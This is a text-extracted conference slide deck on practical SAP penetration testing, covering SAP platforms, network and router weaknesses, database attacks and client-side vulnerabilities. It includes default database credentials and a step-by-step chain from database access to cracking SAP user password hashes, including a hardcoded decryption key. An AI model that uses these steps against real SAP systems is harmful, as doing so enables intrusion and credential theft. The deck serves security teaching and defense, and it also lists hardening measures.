156
Invest in security to secure investments Prac%cal SAP Pentes%ng Alexander Polyakov CTO ERPScan

Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

  • Upload
    lydiep

  • View
    214

  • Download
    1

Embed Size (px)

Citation preview

Page 1: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Invest  in  security  to  secure  investments  

Prac%cal  SAP  Pentes%ng    Alexander  Polyakov  CTO  ERPScan  

Page 2: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Alexander  Polyakov  

•  CTO  of  the  ERPScan  company  •  EAS-­‐SEC.org  project  leader    •  Business  applica@on  security  expert  •  R&D  Professional  of  the  year  by  Network  Product  Guide  •  Organizer  of  ZeroNights  conference      [email protected]  TwiMer:  @sh2kerr    

2  erpscan.com   ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 3: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ERPScan  –  innova%ve  company  

•  Develop  soPware  for  SAP  security  monitoring    •  Provide  SAP/ERP  Security  Trainings  and  consul@ng  •  Leader  by  the  number  of  acknowledgements  from  SAP  (150+)  •  Invited  to  talk  at  50+  key  security  conferences   in  20+  countries  

in  all  con@nents  (BlackHat,  RSA,  HITB)  •  Most  acknowledged  ERP  Security  vendor  (18  awards)  Research   team   with   experience   in   different   areas   of   security   from   ERP   and   web   security   to  mobile,   embedded   devices,   and   cri9cal   infrastructure,   accumula9ng   their   knowledge   on   SAP  research.  

   

erpscan.com   3  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Leading   SAP   AG   partner   in   the   field   of   discovering   security  vulnerabili%es    by  the  number  of  founded  vulnerabili%es  

Page 4: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   4  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Introduc9on  to  SAP  

Page 5: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Business  applica%on  security  

   

All  business  processes  are  generally  contained  in  ERP  systems.    Any  informa@on  an  aMacker,  be  it  a  cybercriminal,  industrial  spy  

or  compe@tor,  might  want  is  stored  in  a  company’s  ERP.    This  informa@on  can  include  financial,  customer  or  public  

rela@ons,  intellectual  property,  personally  iden@fiable  informa@on  and  more.  Industrial  espionage,  sabotage  and  fraud  or  insider  embezzlement  may  be  very  effec@ve  if  targeted  at  a  vic@ms  ERP  

system  and  cause  significant  damage  to  the  business.  

erpscan.com   5  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 6: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Big  companies  

erpscan.com   6  ERPScan  —  Invest  In  Security  To  Secure  Investments  

 

Portal  

HR  Logis@cs  

Warehouse  

ERP  

Billing  

Suppliers  Customers  

Banks  Insurance  Partners  

Branches  

BI  

Industry  

CRM  

SRM  

Page 7: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  

                     

Вставьте  рисунок  на  слайд,  скруглите  верхний  левый  и  нижний  правый  угол  (Формат  –  Формат  рисунка),  добавьте  контур  (оранжевый,  толщина  –  3)  

erpscan.com   7  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•  The  most  popular  business  applica@on  •  More  than  250000  customers  worldwide    •  83%  Forbes  500  companies  run  SAP  •  Main  system  –  ERP  •  3  Main  pla�orms  

• NetWeaver  ABAP  • NetWeaver  J2EE  • BusinessObjects  

Page 8: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  ABAP  

•  Main  pla�orm  

•  Base  pla�orm  for:  ERP,SRC,CRM,PLM    

•  Purpose:  Automate  business  processes    

•  If  compromised:    

•  Stopping  of  business  processes  •  Fraud  •  Industrial  espionage  

erpscan.com   8  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 9: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  J2EE  

•  Addi@onal  pla�orm  

•  Base  pla�orm  for  IT  stuff.  Like:    –  SAP  Portal  ,  SAP  XI,  SAP  Solu@on  Manager,  SAP  Mobile,  SAP  xMII  

•  Purpose:  Integra@on  of  different  systems    

•  If  compromised:  

•  Stopping  of  all  connected  business  processes  •  Fraud  •  Industrial  espionage  

erpscan.com   9  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 10: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  BusinessObjects  

•  Addi@onal  pla�orm  

•  Base  pla�orm  for  analy@cs  

•  Mostly  business  oriented:  

•  Business  Intelligence  •  GRC    

•  If  compromised:  

•  Fraud  •  Industrial  espionage  

erpscan.com   10  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 11: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   11  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Introduc9on  to  SAP  

Page 12: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  for  users  

•  Client-­‐server  applica@on    SAP-­‐GUI  with  proprietary  DIAG  protocol  

•  Main  func@ons  –  Transac@ons  executed  in  SAPGUI  

•  Also  possible  to  call  special  background  func@ons  (RFC)  remotely  

•  Possible  to  modify  code  of  transac@ons  or  RFC  func@ons  using  ABAP  language  

•  Possible  to  use  web-­‐interfaces    like  Webdynpro  or    BSP  in  some  applica@ons  like  SRM    

erpscan.com   12  ERPScan  —  invest  in  security  to  secure  investments  

Page 13: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  for  users  

•  SAP  Landscape  –  Test,  Development,  Produc@on,  QA  

•  SAP  Instance  –  Server  Instance,  Dialog  instance  

•  Client  –  Default  clients  –  Client  separa@on    

erpscan.com   13  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 14: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   14  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  0:  Login  to  SAP  system.  

Page 15: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   15  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Introduc9on  to  SAP  Security  

Page 16: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Security  

 •  Complexity      Complexity  kills  security.  Many  different  vulnerabili@es  in  all  levels  from  network  to  applica@on  

•  Customiza%on    Can  not  be  installed  out  of  the  box.  They  have  many  (up  to  50%)  custom  codes  and  business  logic  

•  Risky      Rarely  updated  because  administrators  are  scared  they  can  be  broken  during  updates  and  also  it  is  down@me  

•  Unknown        Mostly  available  inside  a  company  (closed  world)  

   hMp://erpscan.com/wp-­‐content/uploads/pres/ForgoMen%20World%20-­‐%20Corporate%20Business%20Applica@on%20Systems%20Whitepaper.pdf  

erpscan.com   16  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 17: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Security  notes  

erpscan.com   17  ERPScan  —  Invest  In  Security  To  Secure  Investments  

0  

100  

200  

300  

400  

500  

600  

700  

800  

900  

2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   2014  

By  2014    -­‐  2800  SAP  Security  notes  

Page 18: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Pentes%ng  Features  

 •  Deeper  knowledge  of  ERP  than  normal  systems  required  •  ERP  systems  are  mission  cri@cal  and  cannot  be  accidentally  

taken  down  (POC  exploits  too  dangerous)  •  Gaining  shell  /  command  exec  is  not  the  goal  

–  Goal  is  access  to  sensi@ve  data  or  impact  to  business  processes  

 

 

erpscan.com   18  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 19: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Pentes%ng  Features:  deeper  knowledge  

•  Higher  difficulty  than  standard  pen  tests  •  Required  knowledge  of:  

–  Business  processes  –  Business  logic  –  Exploit  tes@ng  impact  risk  assessment  –  High  end  databases  –  Numerous  (some@mes  esoteric)  opera@ng  systems  –  Different  hardware  pla�orms  –  Common  custom  implementa@ons  

   

erpscan.com   19  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 20: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Pentes%ng  Features  :  Exploita%on  

•  Exploit  code  for  ERP  not  easy  to  develop    •  Payloads  have  to  be  adapted  

–  Numerous  hardware,  OS,  release  version,  and  db  systems  to  generate  payloads  for  

–  In  some  causes  up  to  50  different  shellcode  varia@ons  

•  Building  a  test  environment  nearly  impossible  –  Takes  an  expert  a  week  to  properly  install  each  varia@on  –  A  year  to  build  a  comprehensive  test  environment  

   

erpscan.com   20  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 21: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Pentes%ng  Features  :  Shell  

•  A  beMer  approach  required  with  focus  on  –  Architecture  –  Business  Logic  –  Configura@on    –  You  will  get  administrators  access  to  business  data  

•  Rather  than  –  Program  or  Memory  Vulnerabili@es  –  You  will  probably  gain  access  to  OS  and  then  need  to  obtain  access  to  Applica@on  

   

erpscan.com   21  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 22: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Security  areas  

erpscan.com   22  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Code  security  

Business  security  (SOD)  

Infrastructure  security  (Network,OS,Database)  

Applica@on  pla�orm  security  

Legal  user  required  

Legal  user  not  required  

Page 23: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Security  areas  

Erpscan.com   23  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Code  security  

Business  security  (SOD)  

Infrastructure  security  (Network,OS,Database)  

Applica@on  pla�orm  security  

Legal  user  required  

Legal  user  not  required  

Page 24: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Methodologies:  EAS-­‐SEC  

 •  Enterprise  Applica@on  Security  Project    •  Found  in  2010  •  Published  concept  and  top10  issues  for  different  areas    •  Version  2  in  2004    Published  compliance  for  SAP  NetWeaver  ABAP    hMp://erpscan.com/publica@ons/the-­‐sap-­‐netweaver-­‐abap-­‐pla�orm-­‐vulnerability-­‐assessment-­‐guide/      

Exists  to  provide  guidance  to  people  involved  in  the    procurement,  design,  implementa9on  or  sign-­‐off    of  large  scale  (i.e.'Enterprise')  applica9ons.    hMp://www.owasp.org/index.php/OWASP_Enterprise_Applica@on_Security_Project      

erpscan.com   24  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 25: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   25  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Network  level  security  

Page 26: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Network  Security  Agenda  

Top  10  Network/Architecture  issues  by  EAS-­‐SEC      1  Lack  of  proper  network  filtra%on  between  SAP  and  Corporate  network  2  Lack  or  vulnerable  encryp%on  between  corporate  network  and  SAP  3  Lack  of  separa%on  between  TST  DEV  and  PRD  system  4  Lack  of  encryp@on  inside  SAP  Network  5  Insecure  trusted  rela@ons  between  components  6  Insecure  configured  Internet  facing  applica%ons    7  Vulnerable  /  default  configured  Gateways  8  lack  of  frontend  access  filtra@on  9  Lack  or  misconfigured  monitoring  IDS/IPS  10  Insecure  /  inappropriate  wireless  communica@ons  

 

erpscan.com   26  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 27: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Network  Security  at  glance  

It  is  mostly  about:  

•  Network  filtra@on  (ACL)  •  Protocol  security  (Encryp@on)  •  Securing  Internet  access  (SAP  Router)  

 

erpscan.com   27  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 28: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Network  filtra%on  

erpscan.com   28  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Almost  every  listed  applica@on    have  vulnerabili@es  and  misconfigura@ons  that  can  be  used  to  gain  access  to  SAP  

 hMp://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/4e515a43-­‐0e01-­‐0010-­‐2da1-­‐9bcc452c280b?QuickLink=index&overridelayout=true    

Page 29: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   29  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  1:  Nmap  scan  of  SAP  

Page 30: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Why  cri%cal?  

•  Administra@ve  SAP  services  can  have  direct  Internet  access  •  Even  if  you  sure  that  not  •  To  prove  in  we  run  “SAP  Security  in  Figures  report”  •  All  of  possible  services  were  found  at  least  once  

 

erpscan.com   30  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Myth:  SAP  systems  adacks    available  only  for  insiders  

Page 31: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Why  cri%cal?  

erpscan.com   31  ERPScan  —  Invest  In  Security  To  Secure  Investments  

About  10000  systems  including:    Dispatcher,  Message  server,  SapHostcontrol,  Web-­‐  services  

Page 32: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Protocol  security  

erpscan.com   32  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Soe     Port     Protocol   Pass  encr   Data  encr   Mi%ga%on  

SAPGUI   32<SN>   DIAG   Compession  (can  be  decompresssed)  

Compression  (can  be  decompressed)  

SNC  

WEBGUI   80<SN>   HTTP   Base64   no   SSL  

RFC   33<SN>   RFC   XOR   no   SNC  

Message  server   36<SN>   No   no   SNC    

Visual  Admin   5<SN>04   P4   Prorietary  (broken)   Prorietary  (broken)    

SSL  

IIOP   5<SN>07  

J2EE  Telnet   5<SN>08   No   No    VPN/Disablse    

LogViewer   5<SN>09   prorietary   md5   No   NO  

MMC   5<SN>13   HTTP   Base64   no   SSL  

Page 33: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   33  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Router  security  

Page 34: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Router  

SAP  Router  –  reverse  proxy  server:  

•  Transmit  connec@ons  

–   From  internet  lo  company  

–   From  SAP  AG  to  company  

–   Between  networks  –   Between  clients/partners  

•  Listen  by  default  port  3299  •  Can  be  installed  in  windows/linux  •  Support  encryp@on  (SNC)  and  ACL    

erpscan.com   34  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 35: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Router  bug  1  (Table  bypass)  

There  is  an  ACL  table  to  prevent  unauthorized  access  

•  D    172.16.0.1                          192.168.1.1        22  •  P      172.16.0.4                        192.168.1.1        3301              passwd  •  S      172.16.0.5                          192.168.1.1        *                          passwd  •  .  •  .  •  .  •  KP                              *                                192.168.1.1      8000  •  P                                      *                                                  *                                  *  

erpscan.com   35  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 36: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Router  bug  2  (non  SAP  services)  

•  Some@mes  administrators  use  SAPRouter  also  for  rou@ng  other  protocols  

•  It  is  possible  to  connect  any  port  •  In  old  versions  *  means  any  port  is  allowed  •  In  new  versions  *  means  any  SAP  port  is  allowed  

 •  P    172.*.*.*                              *        3389  •  P      *                                                          *        telnet                

erpscan.com   36  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 37: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Router  bug  3  

•   Informa@on  disclose  about  router  table  •   If  router  configured  with  special  parameter  -­‐i  •   Router  table  can  be  remotely  disclosed  •   In  real  world  ~20%  of  routers  configured  in  such  way  

erpscan.com   37  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 38: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Router  bug  4  (DOS)  

•   If  you  found  informa@on  disclose  •  Or  brute  for  at  least  one  service  which  can  be  accessed  thought  

SAP  Router    •  You  can  run  DOS  aMack  on  SAP  Router  •  By  default  router  pool  limited  to  3000  connec@ons  •  In  1  minute  you  can  disable  SAPRouter  

erpscan.com   38  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 39: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Router  bug  5  (full  access)  

•  Auth  bypass  •  If  router  configured  with  special  parameter  -­‐x  •  Router  can  be  remotely  reconfigured  •  In  real  world  ~8%  of  routers  configured  in  such  way!      

erpscan.com   39  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 40: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Router  bug  6  (Memory  corrup%on)  

•  Memory  corrup@on  issue  were  found  by  ERPScan  team  •  Remote  compromise  without  authen@ca@on  •  Cant  disclose  details  now    •  85%  vulnerable  NOW!        

erpscan.com   40  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 41: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   41  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Database  level  security  for  SAP  systems  

Page 42: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Database  Security  Agenda  

•  Cri@cal  database  data  •  AMacking  Database  •  From  database  to  SAP  •  Securing  Database  

 

erpscan.com   42  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 43: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Cri%cal  database  data  

•  We  are  interested  in  data  that  can  help  us  to  get  into  SAP  •  Data  stored  in  tablespace  SAPR3  or  SAP<SID>  •   Interes@ng  tables:      USR02  —  password  hashes  

   SSF_PSE_D  —  SSO  keys    

   RFCDES  –  passwords  for  RFC  connec@ons    

   ICFSERVLOC  –  passwords  for  ICF  services  

   REPOSRC  –  ABAP  programs  

 

erpscan.com   43  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 44: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Adacking  Database  (OWASP-­‐EAS)  

Top  10  OS  Issues  by  OWASP-­‐EAS  1  Default  passwords  for  DB  access  2  Lack  of  DB  patch  management  3  Unnecessary  Enabled  DB  features    4  lack  of  password  lockout/complexity  checks  5  Unencrypted  sensi@ve  data  transport  /  data  6  Lack  or  misconfigured  network  access  control  7  Extensive  user  and  group  privileges  8  lack  or  misconfigured  audit  9  Insecure  trust  rela%ons  10  Open  addi@onal  interfaces  

erpscan.com   44  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Specific  

SAP  Specific  

SAP  Specific  

Page 45: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Adacking  Database  (OWASP-­‐EAS)  

•  Oracle  is  s@ll  most  popular  database  for  SAP  •  By  default  listen  port  1527  •  Common  aMacks:  

–  Default  Oracle  passwords  –  Simple  passwords  bruteforce  –  Protocol  vulnerabili@es  (overflows)  –  Listener  aMacks  (remote  registra@on  of  log)  

erpscan.com   45  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Direct  access  to  Database  =  full  SAP  compromise  

Page 46: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Default  passwords  

•  Default  SAP’s  database  users/passwords  –  SAPR3/SAP  

•  Default  Oracle  database  users/passwords  –  SYS/CHANGE_ON_INSTALL  –  SYSTEM/MANAGER  –  SCOTT/TIGER  –  DBSNMP/DBSNMP  

erpscan.com   46  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 47: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Misconfigured  access  control    

•  Oracle  configura@on  REMOTE_OS_AUTHENT  •  If  set  to  TRUE  oracle  trusts  remote  system  for  connec@ng  to  

listener  •  Remote  user  must  have  <SID>ADM  name  •  No  need  for  password  or  anything  else!  

 

erpscan.com   47  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 48: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Misconfigured  access  control    

erpscan.com   48  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 49: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

From  database  to  SAP  

•  Connect  using  OPS$<SID>ADM  •  Select  encrypted  password  from  SAPUSER  table  •  Decrypt  it  (DES  with  known  key  BE_HAPPY)  •  Connect  to  SAP  using  user  SAPR3/SAPSR3/SAPSR3DB  •  Selec@ng  user  hashes  from  SAP<SID>.usr02  table  •  Brute  hashes  using  JohnTheRipper  

erpscan.com   49  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 50: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Oracle  Security  Defense  

•  Close  port  1527  from  everything  but  SAP  •  Secure  listener  by  password  •  Configure  password  policies  

–  FAILED_LOGIN_ATTEMPTS  –  PASSWORD_VERIFY_FUNCTION  

•  Change  default  passwords  •  Encrypt  data  transfer  •  Enable  SQL  Audit  at  DB    

 erpscan.com   50  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 51: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   51  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Applica9on  plaPorm  security  

Page 52: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  

 

erpscan.com   52  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 53: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   53  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Frontend    security  

Page 54: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Why  Adack  users  

•  Users  are  less  secure    •  There  are  thousands  SAP  users  in  one  company    

•  You  can  aMack  them  even  if  Server  is  fully  secured  

•  You  can  aMack  them  from  outside    •  You  can  use  them  as  proxy  for  aMacking  servers  

 

 

erpscan.com   54  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 55: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Typical  Client  Soeware  for  SAP  

•  SAPGUI  •  JAVAGUI    •  WEBGUI    

•  NWBC          •  RFC    •  Applica@ons  such  as  VisualAdmin,  Mobile  client  and  many-­‐many  

other    

 

 

erpscan.com   55  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 56: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Typical  Client  Soeware  for  SAP  

 

erpscan.com   56  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Date Vulnerable Component Author Vulnerability Link

04.01.2007 Rfcguisink Mark Litchfield BOF http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-enjoysap-stack-overflow/

04.01.2007 Kwedit Mark Litchfield BOF http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-enjoysap-stack-overflow/

07.11.2008 Mdrmsap Will Dormann BOF http://www.securityfocus.com/bid/32186/info 07.01.2009 Sizerone Carsten Eiram BOF http://www.securityfocus.com/bid/33148/info 31.03.2009 WebWiewer3D Will Dormann BOF http://www.securityfocus.com/bid/34310/info 15.04.2009 Kwedit Carsten Eiram Insecure Method http://secunia.com/secunia_research/2008-56/ 08.06.2009 Sapirrfc Alexander Polyakov (DSecRG) BOF http://dsecrg.com/pages/vul/show.php?id=115

28.09.2009 WebWiewer3D Alexander Polyakov (DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=143

28.09.2009 WebWiewer2D Alexander Polyakov (DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=144

07.10.2009 VxFlexgrid Elazar Broad , Alexander Polyakov (DSecRG) BOF http://dsecrg.com/pages/vul/show.php?id=117

23.03.2010 BExGlobal Alexey Sintsov (DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=164

unpublished Kwedit

Alexander Polyakov, Alexey Troshichev (DSecRG)

Insecure Method http://dsecrg.com/pages/vul/show.php?id=145

14.12.2010

RFCSDK Alexey Sintsov (DSecRG) Memory Corruption http://dsecrg.com/pages/vul/show.php?id=169

14.12.2010 RFCSDK Alexey Sintsov (DSecRG) Format String http://dsecrg.com/pages/vul/show.php?id=170

unpublished

DSECRG-00173 Alexander Polyakov (DSecRG) Insecure Method later

22.12.2010 NWBC Alexey Sintsov (DSecRG) Memory Corruption hMp://dsecrg.com/pages/vul/show.php?id=210

Page 57: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Implementa%on  fails    

•  Distribu@ves  usually  stored  on  shared  folder    •  If  you  can  gain  this  access  it  is  possible  to  overwrite  dll’s  •  Or  modify  configura@on  file  with  BOF  issues.  

•  Or  overwrite  configura@on  files  with  fake  SAP  server  

 

 

erpscan.com   57  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 58: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   58  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  NetWeaver  –  Applica9on  server  services  

Page 59: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver:  main  components  

•  NetWeaver  Applica%on  Server  ABAP  –  SAP  Gateway  –  SAP  Message  server  –  SAP  Message  server  HTTP  –  SAP  Dispatcher  –  SAP  ICM  –  SAP  MMC  –  SAP  HostControl  

•  NetWeaver  Applica%on  Server  JAVA  –  HTTP  Server  –  SAP  Portal  

erpscan.com   59  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 60: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

